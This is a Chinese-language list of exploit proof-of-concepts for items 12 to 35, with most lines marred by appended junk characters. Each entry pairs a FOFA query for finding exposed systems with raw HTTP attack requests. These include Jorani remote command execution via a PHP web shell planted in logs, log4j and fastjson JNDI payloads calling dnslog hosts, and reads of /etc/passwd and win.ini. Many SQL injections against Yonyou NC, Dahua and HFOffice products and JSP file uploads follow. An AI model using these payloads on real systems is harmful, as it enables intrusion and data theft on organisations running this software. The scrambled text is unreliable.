GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
7 t* y) m& O; gHost: 127.0.0.1" [8 C, l6 Z) g; @% p* m
Pragma: no-cache2 |' O1 Z& H+ v5 d5 O) M
Cache-Control: no-cache+ s  J! ~" A" T# I4 b
Upgrade-Insecure-Requests: 1) Z* o% Z9 z: S4 D- k0 p% H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% b# b# ]% O( E% E+ e. d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, X! k+ R# X$ F9 j  q2 M. nAccept-Encoding: gzip, deflate
& Q, E* D) u) sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8; t1 _% q" ^1 t; h5 H' l
Connection: close9 W  ]8 L7 n. Z
$ r8 f" [- C. m/ [
& ~! F# p+ ], Z7 S
12. Jorani < 1.0.2 远程命令执行
# {/ x# W7 v, t6 [FOFA:title="Jorani") {' K/ w0 r6 ?  E
第一步先拿到cookie  `" s! A& B( h3 n! ~
GET /session/login HTTP/1.1
7 M9 h. F/ z( l* s' ZHost: 192.168.190.30; w3 |7 a6 T) Y( F+ ?* O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 }( v3 R/ ~1 U. bConnection: close
! T# n! ^/ I4 M* F; AAccept-Encoding: gzip2 C+ J& {  F+ h
5 z! h6 d% v( \- _% `; O" i' K' I9 V

; x# `" {  }3 g0 I  T2 z响应中csrf_cookie_jorani用于后续请求
$ }, R: U, Y1 V; A$ fHTTP/1.1 200 OK/ w1 b! V7 ~# O6 f4 G9 U. A
Connection: close! B% P2 n# C  }$ _" s7 o
Cache-Control: no-store, no-cache, must-revalidate4 v4 @! V4 r" ~9 f4 x/ j
Content-Type: text/html; charset=UTF-8
6 H+ @# s- p8 [Date: Tue, 24 Oct 2023 09:34:28 GMT5 O% e8 O, C: Z- m
Expires: Thu, 19 Nov 1981 08:52:00 GMT$ i1 G" y8 U2 `6 Q
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT& k( R& T; }) k# {2 U4 Q
Pragma: no-cache
: q3 r& K3 \9 q& m* f3 QServer: Apache/2.4.54 (Debian)
1 Y; }' O$ G7 V( T/ YSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
* p/ l) C) _  C4 oSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
1 X# o5 a" x. v: B$ p" e7 dVary: Accept-Encoding
3 P' l- l$ H0 N; ^" m; Q0 ^* K! ~) Y2 |- P7 `' ]2 j6 V
9 c( k$ y! x3 `1 z8 M: V5 O+ h
POST请求,执行函数并进行base64编码
) s6 D. Z  H" Y' Z4 QPOST /session/login HTTP/1.1
* O% t0 x* _7 H" z6 y" OHost: 192.168.190.30
+ y4 X5 U& v' qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
  J( V0 I8 r4 u' U- i& M4 Z+ A6 zConnection: close, J$ ^" x1 W' D+ m6 b
Content-Length: 252* T. E( U2 }3 m2 L5 m9 Q  F. j
Content-Type: application/x-www-form-urlencoded
# w/ h- K* W* ?5 p  ^" f5 vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
4 e' w7 g% A1 gAccept-Encoding: gzip
  p5 m' }6 u% {& v& B
# ]' C& y0 `8 {' A! B3 Bcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& u6 P+ B4 u; J% }* e8 t  q( W3 ]

7 Z2 S: ]. I- Z9 M2 d0 x  U/ @; P% q5 q# b

' i% n. C- l1 Q7 ^# A) m向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串. [2 a/ R% R4 S7 _: p
GET /pages/view/log-2023-10-24 HTTP/1.19 h+ N  E2 `! @. E6 ^
Host: 192.168.190.30$ n4 S$ w- N$ d: W( e# `8 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- R2 \  i) `2 _# k- q, {
Connection: close
: b  ?( V8 T% P1 u- E+ hCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
+ Y/ ~6 Z9 S/ p7 JK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=  M, I, y& H- `: K+ }/ N$ T
X-REQUESTED-WITH: XMLHttpRequest3 p* G5 q; u( X  u5 b" ~
Accept-Encoding: gzip
, l  _$ S6 [& M  R8 \% _, {) l  P1 t  l7 _4 `/ Z! ]( i" i
0 c* [3 o5 }9 `/ {2 o1 X
13. 红帆iOffice ioFileDown任意文件读取
3 S! F% I7 k/ o( `/ sFOFA:app="红帆-ioffice"
; M: u' Q/ x. y: }% q5 ?6 ~GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
2 R; z, s3 l# m( U& UHost: x.x.x.x# J  q' \2 J6 j: w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 ?0 f& K1 A7 B% p  D0 v
Connection: close
+ B1 N% m4 E2 z' l4 l) D! `0 PAccept: */*
8 ^6 H- B1 c# a  t* SAccept-Encoding: gzip- c3 m! t2 y# p* u- z& M

4 k, F! P+ H) G3 Y! ^. e
, W. b6 {; G( ]! n" T+ m14. 华夏ERP(jshERP)敏感信息泄露
+ a  u9 i; M2 x! `* l. g1 OFOFA:body="jshERP-boot"# n# p) a7 d- p  I9 Q
泄露内容包括用户名密码
/ J2 v8 |. b0 S9 {0 NGET /jshERP-boot/user/getAllList;.ico HTTP/1.1  e: G; A! V- y+ N* t  {$ ~
Host: x.x.x.x9 ^) `. J! d/ E, H2 ?1 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.365 W8 h5 w% z7 a
Connection: close
+ Y% X/ l- _  F( J* q) ~Accept: */*
6 T' D1 U7 i8 r" v* m' H" lAccept-Language: en
+ v  w  c5 E* b9 jAccept-Encoding: gzip
6 j$ a+ i' C/ w/ W8 g6 ]6 e
) m  Z2 o3 Z# Z3 U, f% |. v; K' f6 R3 t- E, @" X
15. 华夏ERP getAllList信息泄露' F% B6 g  H0 m/ b: N! \6 s1 c
CVE-2024-0490* U/ M* \, J5 n/ y  M: P6 U
FOFA:body="jshERP-boot"
$ ?+ I0 w+ ^2 d9 e' Z; ~( x泄露内容包括用户名密码# s8 r- c+ ]% |7 k$ `8 F* w
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 m' }7 J3 f! e; tHost: 192.168.40.130:1009 _, u. |) `6 _- X- W* y* d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* \/ s" j, F9 J8 T+ n! ~
Connection: close
  w! u: w( Q& ^1 ]+ tAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" H4 y, t5 k9 \, h  n
Accept-Language: en, s/ O$ Z' \4 j, I* m
sec-ch-ua-platform: Windows
9 q- l6 P) V8 e3 vAccept-Encoding: gzip6 l! I( R  r# b( f& w- x
% x) X3 m# H  B; [, E
0 X" I9 W- a4 T" _1 [
16.  红帆HFOffice医微云SQL注入" C  S' S0 w7 I: A
FOFA:title="HFOffice"
& q  @3 C0 e; |' ?; e1 dpoc中调用函数计算1234的md5值: H+ c# X' B; L5 `/ l: Q+ E
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
/ Y4 I1 I( F4 f+ q( o2 t$ AHost: x.x.x.x/ \  j) v  k) f/ u: K+ G% s' G) T0 U
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
2 L; [  U2 ]- nConnection: close
1 v' i( o0 j4 N+ h8 RAccept: */*
8 U" i( n3 I* P- B: DAccept-Language: en
9 @6 o' |/ R7 v; s( ]+ j( r) gAccept-Encoding: gzip
) W% J# e6 |! e! S! D7 {; K9 M2 e; ?/ Z& ^( D: Q2 W! n

0 ~- Z0 X/ N* p7 O4 O$ y17. 大华 DSS itcBulletin SQL 注入
. F0 c- b0 [" f" q" {FOFA:app="dahua-DSS"" n( ^* K6 O. Z- F9 V3 I
POST /portal/services/itcBulletin?wsdl HTTP/1.1
. G( `! [7 D/ Y# M" AHost: x.x.x.x# c- H$ p, C$ a2 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% |+ g5 I9 ?& R5 N3 CConnection: close
1 n# K% |4 z* _9 R! o% SContent-Length: 345
# Z$ d7 u# K* i7 }$ J6 R. Z# pAccept-Encoding: gzip
$ s6 z7 p$ M# C9 w. |! n6 H
- F; z. V, a2 i1 I: l<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
/ l$ W) D+ D! y) \4 V( J1 M; j1 g2 @1 M<s11:Body>
0 V" f' M8 E# [$ z    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>: g4 p( I1 S% ~* {/ g
      <netMarkings>
6 q' O8 ?, b; s. V/ ]       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=11 _' F- B+ ^$ a/ S4 _* X
      </netMarkings>. m9 g' y; U9 n$ K
    </ns1:deleteBulletin>, t% u/ e0 Q$ p7 p# h" o
  </s11:Body>5 |2 Y# o, d" ~0 ?' O0 J# U6 R
</s11:Envelope>: M% ^5 z9 G' Y, j% U  W( p0 X

( c- x% ]. U* E' r8 c
( ^4 i9 T- P$ V" X' e' V18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
  S# ^! P" O: P: }4 b4 }+ OFOFA:app="dahua-DSS"# L9 ~2 ~! g: f) ~- _3 l
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1  D# V3 K" Q5 V$ V4 J1 U- R
Host: your-ip
; \" Z' I6 p/ d" `7 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ k$ z3 \- |( R. ~5 PAccept-Encoding: gzip, deflate
# I8 c& M$ S) _6 e" l5 QAccept: */*
) i- q5 s. t6 u0 J0 NConnection: keep-alive8 i$ w& y0 `/ W$ [) W) J8 t5 q
# D! G! w, e3 P

, e! l& W# q0 i/ _, \2 _) |3 J/ q2 c; L0 ^$ G1 j+ _0 T
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入: H% w- }+ e& i" s+ K- A$ U
FOFA:app="dahua-DSS"' O& Z2 H2 r! L3 h) j* H
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.18 d8 P. N* o1 k% |: L. P
Host:* \) D, E( ]* W- L3 h
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; i5 t8 A4 h$ L6 T. ~
Accept-Encoding: gzip, deflate0 F2 [  `" R, U  `
Accept: */*+ |8 j7 {( u, s5 f7 R4 s+ M
Connection: keep-alive
4 O  `% A5 t' y0 U- P5 h( e2 [2 `/ G  f6 u0 R
- q0 r% C& I! Q8 ]
20. 大华ICC智能物联综合管理平台任意文件读取, v* g" o1 ^( j) y2 m. ~: j$ Y( }
FOFA:body="*客户端会小于800*"
/ P& {7 W' S% ~" RGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1) u9 r5 a0 k% b5 O( P3 d
Host: x.x.x.x, S% O$ _; I* J
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* X! Q: u" ]; p8 J+ vConnection: close
: X0 j9 N) T4 E/ ^Accept: */*! |5 _" ~! ^1 T3 m% k
Accept-Language: en
0 {) ~8 T3 h8 J7 V" K3 nAccept-Encoding: gzip
2 q! l0 e# Z) a: g+ r- X$ Q8 @; |" U; |' e& ~, H
7 A8 j3 ?+ G7 \. p0 W2 d
21. 大华ICC智能物联综合管理平台random远程代码执行$ k3 m3 {8 ~1 a( s
FOFA:icon_hash="-1935899595"
) n* }" }: J4 ?! l2 C$ }- q3 Y! rPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# i! U9 @7 U( b9 bHost: x.x.x.x" R' y1 C! ]; y7 Y7 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: f& r1 A+ }* JContent-Length: 161
0 Y9 E6 h  x! m- p: h' g0 k* lAccept-Encoding: gzip0 N8 f8 Z$ G* t7 B1 B5 A  d- x
Connection: close0 Q( u( S5 w5 i
Content-Type: application/json;charset=utf-8
6 x+ P! [" I! X) z9 N2 D) w2 T4 q( b) p8 U8 P
{& n# ]4 s5 y5 k
"a":{
8 `0 m, _1 D  U( w   "@type":"com.alibaba.fastjson.JSONObject",
' g! i4 T1 R! ?, G2 b; ~7 T    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
+ U! T3 j# k# @5 c$ U7 V  }""
8 s$ F7 a8 Y* B2 ]- l0 E}( C+ y5 b2 w" ]+ g

: O4 g+ G4 ^2 B( z8 `& m( h! B0 g# \0 x# t, F2 S
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. l& F8 \/ u, }- ^' O& X6 pFOFA:icon_hash="-1935899595"
+ D: b4 G' ]" aPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" F( v. u6 f( A4 @. g
Host: your-ip* G5 Y- B% p: I9 Y+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% x2 ?) w+ ?* {0 Y# t; X
Content-Type: application/json;charset=utf-8/ g7 a$ {3 d  s9 h+ u

1 l- u: [: f! |5 C- N{
  x- j" @7 o0 t8 s% A1 Q5 r- S"loginName":"${jndi:ldap://dnslog}"
+ G6 N- l: D7 m/ Y7 h! _" ]}! {4 S7 M: u7 c# N: q$ O
9 j: N- e7 u2 j0 u

2 ?$ P7 `) `: P" Z' e
6 g3 C4 O- v1 G- X1 F4 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! t2 {' a9 m$ D
FOFA:icon_hash="-1935899595"% \5 B; q" C2 A* z# @0 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 Y  n) r! k2 X/ H2 W- W5 {
Host: your-ip* V7 V$ }. T; i+ R7 B# a8 \3 j7 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 J/ c' x+ _* wContent-Type: application/json;charset=utf-8; o4 b, }( M* K0 v' I
Accept-Encoding: gzip
: \) u) t2 O/ Z* e0 k: b9 k: p/ ~. }Connection: close' G8 N8 ?9 D: l6 ^, V3 H6 p
' f% k+ M& t- t6 a: y" ~" |
{
8 C5 J+ g- |) j0 ^    "a":{
  M( `; r. `" ^( S; k        "@type":"com.alibaba.fastjson.JSONObject",
$ p" T) Q' Y4 v) }9 F" K       {"@type":"java.net.URL","val":"http://DNSLOG"}
6 G+ p9 P+ f1 r: y+ |8 x        }""
* I) O8 O7 T( m3 o4 ?$ P3 g; |- W}: E4 K: s1 T0 _* Q

4 O5 A' f" P+ C! E# @+ @8 j4 S( s6 O* J1 X* J
24. 用友NC 6.5 accept.jsp任意文件上传2 E1 U* C' P+ c9 E7 L9 E
FOFA:icon_hash="1085941792"
1 R# ^$ Z# g/ Y2 n( T( Z3 uPOST /aim/equipmap/accept.jsp HTTP/1.1  L- O9 a2 V$ G! u9 B  a
Host: x.x.x.x' I' z% D- f: {0 T3 v0 Q& n
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
7 h5 C/ T3 ]! v! A0 s& H; I$ f5 e" N1 lConnection: close, c: D6 o, m) ?9 q  _& F
Content-Length: 449. R$ m! O6 l! I7 m" F) _* d
Accept: */*' e; l/ D- b5 }5 L  |
Accept-Encoding: gzip( P+ v5 p! v7 {4 \2 D
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
9 K# K! i$ x! F  V7 W5 Y% z0 t, `" H, ~  b3 E' S; o
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ f/ f/ q+ k. k4 w* n- h3 z+ fContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
. ^/ j! b) H; u- ~Content-Type: text/plain
( t( Z& S( _" ^0 \" f1 p8 E- G: s, ?; ?, i5 q6 B9 u
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>4 G7 s8 D  E. J, e1 Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
9 m, n, D+ [: A) K1 VContent-Disposition: form-data; name="fname"
0 @% `( g  F, p( [& H& p. A8 t* ]1 Z" s+ G2 ^- {5 W
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; ~; \8 l  X3 @-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
' \; m8 A% y! V7 L& g" e. o! w" `8 D: l
3 R9 ~# Y4 b$ Z6 f+ w
25. 用友NC registerServlet JNDI 远程代码执行5 j0 M: [: d/ g/ S9 W& {
FOFA:app="用友-UFIDA-NC"
1 {6 @9 a6 i+ i) x; pPOST /portal/registerServlet HTTP/1.1
1 ?2 Q% `! ]+ S- v/ QHost: your-ip
+ k! i* B8 z, Z" E/ N" tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
  J4 m3 {; N8 w! `% G% X. lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.91 e& K* W) p6 A8 ~1 s, D
Accept-Encoding: gzip, deflate6 p& q9 c  H6 T8 A5 z0 s
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.64 F; }  l' }( ?) ?" |
Content-Type: application/x-www-form-urlencoded, t5 {7 B& Y3 i0 Y

3 F- l$ x" s* a) W' o% ]- H& Btype=1&dsname=ldap://dnslog% H0 @8 S; i1 R; N+ ?

8 G- \6 m  ]! U7 k+ x* q; I0 i) h. T5 o! E! @; a; m6 Q
* M0 b! t, x7 N# S! P: y
26. 用友NC linkVoucher SQL注入! _. d& p9 M& k+ B, _: s- B
FOFA:app="用友-UFIDA-NC"
0 z( @0 Q0 h5 H) ?& p! \, UGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" A0 h# I% Z: S  W# |- X# w9 X7 l1 lHost: your-ip! A' t9 X  H/ |: d8 o+ W$ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ p' Y) a  m( i! nContent-Type: application/x-www-form-urlencoded
' k1 X& s( \' U8 @( F* v' Z4 d3 F( pAccept-Encoding: gzip, deflate6 N* C4 i9 G% ^8 q9 E2 |
Accept: */*' u; w+ ?5 U" o9 W" r- j2 w
Connection: keep-alive  N3 u% V) I  g+ j3 j$ ^' k

& T( d* z$ W' O3 L& t8 |
# _0 u5 e: E8 ^- Q, @27. 用友 NC showcontent SQL注入( r& ]# s% c% {
FOFA:icon_hash="1085941792"1 I  |8 y7 p7 O5 F" t
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
7 l( g! F/ ^6 m  f1 y( E, Q: ^Host: your-ip
& m' W4 r. i% |9 M* m* r7 l1 k) `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; |3 e, f( i* D$ k  S3 x  UAccept-Encoding: identity
. r- b+ W$ X5 R1 o6 M" W; hConnection: close
# J% f! c( o1 @7 o  uContent-Type: text/xml; charset=utf-8% E3 q4 b# |: _
% t6 Z3 B" c0 H- @( o$ m

+ o# Z, r2 C( D2 L28. 用友NC grouptemplet 任意文件上传. G% o+ z4 H* J8 u3 v
FOFA:icon_hash="1085941792"
  m* P2 [; a; w, D6 p1 m/ w& O2 z4 RPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1# ]$ W2 I$ M! t1 L
Host: x.x.x.x' X$ R# [7 _7 Y. l" C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
9 K+ S) l+ ~! U; SConnection: close" O% B7 W% ~  z$ \5 _% C6 P
Content-Length: 268
" [5 r; L% ?& V3 RContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk0 I/ \# u! T+ J4 t
Accept-Encoding: gzip
1 M9 J6 `8 i' N& A$ g! U
* A/ `# v/ ^& ^, s------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 K/ _- c- m0 B" A# C4 z$ M
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"+ h6 j5 }$ W0 K' O8 Q$ c  c
Content-Type: application/octet-stream
2 L* E3 l) L2 z" `- o* ~. j
3 M8 [$ l4 g% v) f<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>, W2 E, x3 A% A) v
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
; V. z% p- E$ S( z* P- c
% v, [) i- A- E2 Z: V5 u6 v4 |1 y: T0 _2 u' t& z
/uapim/static/pages/nc/head.jsp
$ h0 z( l; [$ C7 H  E: i3 r6 S( c9 @6 y- }
29. 用友NC down/bill SQL注入
& F4 ^9 G" p$ T, VFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! g- J5 t0 x) |) K
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 E9 K, A# x# P+ SHost: your-ip
) k1 E( P- ^9 q! `2 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! ~3 l  M& q' {: }Content-Type: application/x-www-form-urlencoded
4 z$ ^/ T: g: }) AAccept-Encoding: gzip, deflate
6 S% d) X) R% }4 E. [# @" y. X7 dAccept: */*# @  k: g/ {- a! K9 u7 W; y
Connection: keep-alive
1 Y# F* k5 B  k( J$ ~% x' L5 q% I1 M' \1 F$ \7 [" Q9 N

. v3 p  x- e6 k% N. O7 s* L. o30. 用友NC importPml SQL注入" J% I9 G  z5 K+ N1 h2 t
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 G; l# H0 e9 h8 d4 Q1 LPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1& n! ~! W5 ^% ^
Host: your-ip
( I! P5 {5 m% i% OContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V& [5 z! t+ [* f, k! J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 T* f7 g) I# g& W, c) U' h
Connection: close
. j; o3 o. p+ `0 \+ N$ c4 k/ t4 N3 `, @( S# r' I" e5 x* v
------WebKitFormBoundaryH970hbttBhoCyj9V" |: [( g2 o( a6 p
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
: ?* H: L! f; VContent-Type: image/jpeg
2 Q0 r: k8 d. m* K------WebKitFormBoundaryH970hbttBhoCyj9V--
8 b) q' A9 ]! t
0 x0 e; b8 u9 V. H+ P, k
% G3 f# H) M( ^& Q1 z, _31. 用友NC runStateServlet SQL注入. c9 T" i3 }- }) X% D5 ^  T" }
version<=6.5
1 ~* L' f0 \% k) J+ aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% u9 J. |" c& U8 v# i$ Y
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1: F( v  H- x  `
Host: host
2 K0 o2 d2 I# y0 j( }2 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; h& ~' I* w) e$ @" t% y9 ?: YContent-Type: application/x-www-form-urlencoded$ B* t2 x8 G; b* A+ F, `) _
/ ], D' [( Q% ~- D; m  o

/ {: w) }) g9 S9 j, `6 v32. 用友NC complainbilldetail SQL注入
. g0 @4 j! ?0 U, q4 ~) Tversion= NC633、NC65
0 l* ^1 q, V8 O: y. XFOFA:app="用友-UFIDA-NC"6 w( p% y$ x% h5 [: j& m( e- \5 p* l
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ c+ s) F- |9 a/ v2 O8 f* M. S8 m
Host: your-ip
& C4 N- l' y2 H# F- O2 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 O% U: S( [1 S$ O: n5 y* z/ AContent-Type: application/x-www-form-urlencoded! D: c' p! H1 X1 c+ {, n! U
Accept-Encoding: gzip, deflate6 s5 ?  i8 R* S
Accept: */*; ?+ y9 e5 s1 Y/ m
Connection: keep-alive
$ D- X* A( j# _6 P2 r* e: t3 b9 g  c: H7 ]1 l# _! M; y
* v  S8 E. B$ I$ q; o
33. 用友NC downTax/download SQL注入
; m7 d$ q! x$ y' Zversion:NC6.5FOFA:app="用友-UFIDA-NC"
# D1 R% L  t7 mGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 T$ c- z1 I! R2 o. m6 CHost: your-ip
: E8 ~( {0 O7 u- l' [$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) Q4 W; S; F* a: N3 i
Content-Type: application/x-www-form-urlencoded
- c  y, ]; g: f+ ZAccept-Encoding: gzip, deflate
8 E6 R, A" ~' n' n( f$ O8 W( RAccept: */*( B, c( @& g% N6 D" }
Connection: keep-alive
2 p" c5 @) L/ L& R! ~+ ?
! b9 f: C' a' {5 P8 d
7 z6 }* B1 O: e0 j. M34. 用友NC warningDetailInfo接口SQL注入
+ T5 {1 ~1 @/ h! @7 F2 u- g1 ^FOFA:app="用友-UFIDA-NC"
; A" A( M" B# Z& ]6 G' ~GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1) H- o7 \/ \! K8 w+ X0 k& ?
Host: your-ip
. F3 a  w' k) @5 s- lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ D5 q/ u  [8 I* U. K1 ]; sContent-Type: application/x-www-form-urlencoded- b  ^/ x# [- L) T
Accept-Encoding: gzip, deflate
; i& e7 Q4 }, o% h# HAccept: */*
$ g" T" u0 w- C8 c" D  TConnection: keep-alive  ^" F6 |" v; d3 m6 k

* A  ?: z% X5 }5 J2 s0 P) Q
$ p/ G% y. z; P* `5 o7 k2 i! r5 U3 B, e( }5 A35. 用友NC-Cloud importhttpscer任意文件上传4 @' k+ i% y& K, s
FOFA:app="用友-NC-Cloud"
